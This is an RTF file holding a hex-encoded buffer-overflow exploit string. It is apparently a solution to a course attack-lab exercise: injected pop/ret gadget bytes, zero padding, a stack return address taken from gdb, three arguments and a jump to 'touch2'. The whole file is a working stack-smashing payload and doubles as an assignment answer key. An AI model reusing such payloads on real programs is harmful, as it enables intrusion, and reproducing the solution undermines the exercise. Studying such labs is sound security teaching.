{\rtf1\ansi\ansicpg1252\cocoartf2818
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Menlo-Regular;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\csgray\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww16140\viewh8400\viewkind0
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardirnatural\partightenfactor0

\f0\fs22 \cf2 \CocoaLigature0 /* injected code */\
5f /* pop rdi */\
5e /* pop rsi */\
5a /* pop rdx */\
c3 /* ret */\
\
/* padding */ \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\
\
/* return address: injected code */ /* comes from p /x $rsp in getbuf */\
68 5c 65 55 00 00 00 00\
\
/* argument1 */\
67 21 2b 49 00 00 00 00\
\
/* argument2 */\
2f 22 2b 49 00 00 00 00\
\
/* argument3 */\
9f 20 2b 49 00 00 00 00\
\
/* return address: touch2 */\
f3 16 40 00 00 00 00 00}